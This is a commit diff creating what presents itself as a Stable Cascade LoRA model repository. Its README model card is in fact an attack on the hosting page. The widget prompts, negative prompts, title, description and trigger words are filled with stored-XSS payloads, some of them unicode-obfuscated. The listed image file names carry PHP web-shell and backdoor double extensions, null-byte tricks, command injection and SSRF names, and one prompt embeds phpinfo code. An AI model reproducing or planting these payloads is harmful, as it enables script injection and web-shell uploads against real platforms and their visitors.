initial commit

.gitattributes

@@ -0,0 +1,55 @@
+*.7z filter=lfs diff=lfs merge=lfs -text
+*.arrow filter=lfs diff=lfs merge=lfs -text
+*.bin filter=lfs diff=lfs merge=lfs -text
+*.bz2 filter=lfs diff=lfs merge=lfs -text
+*.ckpt filter=lfs diff=lfs merge=lfs -text
+*.ftz filter=lfs diff=lfs merge=lfs -text
+*.gz filter=lfs diff=lfs merge=lfs -text
+*.h5 filter=lfs diff=lfs merge=lfs -text
+*.joblib filter=lfs diff=lfs merge=lfs -text
+*.lfs.* filter=lfs diff=lfs merge=lfs -text
+*.lz4 filter=lfs diff=lfs merge=lfs -text
+*.mlmodel filter=lfs diff=lfs merge=lfs -text
+*.model filter=lfs diff=lfs merge=lfs -text
+*.msgpack filter=lfs diff=lfs merge=lfs -text
+*.npy filter=lfs diff=lfs merge=lfs -text
+*.npz filter=lfs diff=lfs merge=lfs -text
+*.onnx filter=lfs diff=lfs merge=lfs -text
+*.ot filter=lfs diff=lfs merge=lfs -text
+*.parquet filter=lfs diff=lfs merge=lfs -text
+*.pb filter=lfs diff=lfs merge=lfs -text
+*.pickle filter=lfs diff=lfs merge=lfs -text
+*.pkl filter=lfs diff=lfs merge=lfs -text
+*.pt filter=lfs diff=lfs merge=lfs -text
+*.pth filter=lfs diff=lfs merge=lfs -text
+*.rar filter=lfs diff=lfs merge=lfs -text
+*.safetensors filter=lfs diff=lfs merge=lfs -text
+saved_model/**/* filter=lfs diff=lfs merge=lfs -text
+*.tar.* filter=lfs diff=lfs merge=lfs -text
+*.tar filter=lfs diff=lfs merge=lfs -text
+*.tflite filter=lfs diff=lfs merge=lfs -text
+*.tgz filter=lfs diff=lfs merge=lfs -text
+*.wasm filter=lfs diff=lfs merge=lfs -text
+*.xz filter=lfs diff=lfs merge=lfs -text
+*.zip filter=lfs diff=lfs merge=lfs -text
+*.zst filter=lfs diff=lfs merge=lfs -text
+*tfevents* filter=lfs diff=lfs merge=lfs -text
+# Audio files - uncompressed
+*.pcm filter=lfs diff=lfs merge=lfs -text
+*.sam filter=lfs diff=lfs merge=lfs -text
+*.raw filter=lfs diff=lfs merge=lfs -text
+# Audio files - compressed
+*.aac filter=lfs diff=lfs merge=lfs -text
+*.flac filter=lfs diff=lfs merge=lfs -text
+*.mp3 filter=lfs diff=lfs merge=lfs -text
+*.ogg filter=lfs diff=lfs merge=lfs -text
+*.wav filter=lfs diff=lfs merge=lfs -text
+# Image files - uncompressed
+*.bmp filter=lfs diff=lfs merge=lfs -text
+*.gif filter=lfs diff=lfs merge=lfs -text
+*.png filter=lfs diff=lfs merge=lfs -text
+*.tiff filter=lfs diff=lfs merge=lfs -text
+# Image files - compressed
+*.jpg filter=lfs diff=lfs merge=lfs -text
+*.jpeg filter=lfs diff=lfs merge=lfs -text
+*.webp filter=lfs diff=lfs merge=lfs -text

README.md

@@ -0,0 +1,247 @@
+---
+tags:
+- text-to-image
+- stable-diffusion
+- lora
+- diffusers
+- template:sd-lora
+widget:
+- text: >-
+    <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+    OnError=confirm(1)> <fieldset//%00//onsite
+    OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+    onmouseleave=print()>
+  parameters:
+    negative_prompt: >-
+      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+      OnError=confirm(1)> <fieldset//%00//onsite
+      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+      onmouseleave=print()>
+  output:
+    url: images/bugzilla2.jpg
+- text: >-
+    <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+    OnError=confirm(1)> <fieldset//%00//onsite
+    OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+    onmouseleave=print()>
+  parameters:
+    negative_prompt: >-
+      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+      OnError=confirm(1)> <fieldset//%00//onsite
+      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+      onmouseleave=print()>
+  output:
+    url: images/bugzilla.jpg
+- text: >-
+    <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+    OnError=confirm(1)> <fieldset//%00//onsite
+    OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+    onmouseleave=print()>
+  parameters:
+    negative_prompt: >-
+      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+      OnError=confirm(1)> <fieldset//%00//onsite
+      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+      onmouseleave=print()>
+  output:
+    url: images/xss2.pdf.png
+- text: >-
+    <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+    OnError=confirm(1)> <fieldset//%00//onsite
+    OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+    onmouseleave=print()>
+  parameters:
+    negative_prompt: >-
+      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+      OnError=confirm(1)> <fieldset//%00//onsite
+      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+      onmouseleave=print()>
+  output:
+    url: images/xss1.jpeg
+- text: '-'
+  output:
+    url: images/svg-xss-xml.jpeg
+- text: '-'
+  output:
+    url: images/%00';alert(1); - Copie.jpg
+- text: '-'
+  output:
+    url: images/xsspng.png
+- text: '-'
+  output:
+    url: images/white_hat%0a.png
+- text: '-'
+  output:
+    url: images/ssrf.png
+- text: '-'
+  output:
+    url: images/ssrf.jpg
+- text: '-'
+  output:
+    url: images/simple-backdoor2.php.gif
+- text: '-'
+  output:
+    url: images/simple-backdoor.php.gif
+- text: '-'
+  output:
+    url: images/shell2.php;.jpg
+- text: '-'
+  output:
+    url: images/shell.png
+- text: '-'
+  output:
+    url: images/shell.php;.jpg
+- text: '-'
+  output:
+    url: images/rce2.php.jpg
+- text: '-'
+  output:
+    url: images/rce.php.jpg
+- text: '-'
+  output:
+    url: images/pwnd.php.jpg
+- text: '-'
+  output:
+    url: images/phppng.png
+- text: '-'
+  output:
+    url: images/phpinfo.php.gif
+- text: "ASCII\0\0\0<? phpinfo(); ?>"
+  output:
+    url: images/phpinfo.jpg
+- text: '-'
+  output:
+    url: images/php-backdoor.php.jpg
+- text: '-'
+  output:
+    url: images/php-backdoor.php%00.jpg
+- text: '-'
+  output:
+    url: images/php-backdoor.jpg
+- text: '-'
+  output:
+    url: images/onerror=alert('XSS')' a='.jpg
+- text: '-'
+  output:
+    url: images/loading.gif
+- text: '-'
+  output:
+    url: images/kos`uname`oss.jpg
+- text: '-'
+  output:
+    url: images/jpeg.php.jpg
+- text: '-'
+  output:
+    url: images/jpeg.php%00.jpg
+- text: '-'
+  output:
+    url: images/jaja.php.orionn.gif
+- text: '-'
+  output:
+    url: images/image.jpg
+- text: '-'
+  output:
+    url: images/image%00.jpg
+- text: '-'
+  output:
+    url: images/hithere.php.jpg
+- text: '-'
+  output:
+    url: images/gifshell.php.gif
+- text: '-'
+  output:
+    url: images/exploit.png
+- text: '-'
+  output:
+    url: images/exploit.jpg
+- text: '-'
+  output:
+    url: images/exifremover.jpg
+- text: '-'
+  output:
+    url: images/download.gif
+- text: '-'
+  output:
+    url: images/Sun'__img src=x onerror=alert(1)_set.jpg
+- text: '-'
+  output:
+    url: images/404.php.jpg
+- text: '-'
+  output:
+    url: images/1N3.jpg
+- text: '-'
+  output:
+    url: images/';alert(1);x='.jpg
+- text: '-'
+  output:
+    url: images/'+alert(1)+'.jpg
+- text: '-'
+  output:
+    url: images/%22onerror=%22alert(1)%22a=%22.jpg
+- text: '-'
+  output:
+    url: images/%22__img src=x onerror=prompt(1)_.jpg
+- text: '-'
+  output:
+    url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E.png
+- text: '-'
+  output:
+    url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a.png
+- text: '-'
+  output:
+    url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a%0f.png
+- text: '-'
+  output:
+    url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%00.png
+- text: '-'
+  output:
+    url: images/%1.jpg
+- text: '-'
+  output:
+    url: images/%0a1.jpg
+- text: '-'
+  output:
+    url: images/%0a';alert(2);.jpg
+- text: '-'
+  output:
+    url: images/%0a';alert(1);.jpg
+- text: '-'
+  output:
+    url: images/%0011.jpg
+- text: '-'
+  output:
+    url: images/%001.jpg
+- text: '-'
+  output:
+    url: images/%00';alert(2);.jpg
+- text: '-'
+  output:
+    url: images/%00';alert(1);.jpg
+base_model: stabilityai/stable-cascade
+instance_prompt: >-
+  <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
+  OnError=confirm(1)> <fieldset//%00//onsite
+  OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
+  onmouseleave=print()>
+license: bigscience-bloom-rail-1.0
+---
+# &lt;img&#x2F;src&#x3D;x onError&#x3D;&quot;&#x60;${x}&#x60;;alert(&#x60;xss stored&#x60;);&quot;&gt; &lt;Img Src&#x3D;OnXSS OnError&#x3D;confirm(1)&gt; &lt;fieldset&#x2F;&#x2F;%00&#x2F;&#x2F;onsite OnMoUsEoVeR&#x3D;\u0061\u006C\u0065\u0072\u0074&#x60;&#x2F;aaa&#x2F;&#x60;&gt; ?&gt;&lt;img src&#x3D;x onmouseleave&#x3D;print()&gt;
+
+<Gallery />
+
+## Model description 
+
+&lt;img&#x2F;src&#x3D;x onError&#x3D;&quot;&#x60;${x}&#x60;;alert(&#x60;xss stored&#x60;);&quot;&gt;
+&lt;Img Src&#x3D;OnXSS OnError&#x3D;confirm(1)&gt;
+&lt;fieldset&#x2F;&#x2F;%00&#x2F;&#x2F;onsite OnMoUsEoVeR&#x3D;\u0061\u006C\u0065\u0072\u0074&#x60;&#x2F;aaa&#x2F;&#x60;&gt;
+?&gt;&lt;img src&#x3D;x onmouseleave&#x3D;print()&gt;
+
+## Trigger words
+
+You should use `&lt;img&#x2F;src&#x3D;x onError&#x3D;&quot;&#x60;${x}&#x60;;alert(&#x60;xss stored&#x60;);&quot;&gt; &lt;Img Src&#x3D;OnXSS OnError&#x3D;confirm(1)&gt; &lt;fieldset&#x2F;&#x2F;%00&#x2F;&#x2F;onsite OnMoUsEoVeR&#x3D;\u0061\u006C\u0065\u0072\u0074&#x60;&#x2F;aaa&#x2F;&#x60;&gt; ?&gt;&lt;img src&#x3D;x onmouseleave&#x3D;print()&gt;` to trigger the image generation.
+
+
+## Download model
+
+
+[Download](/victim1998p/victimdz/tree/main) them in the Files & versions tab.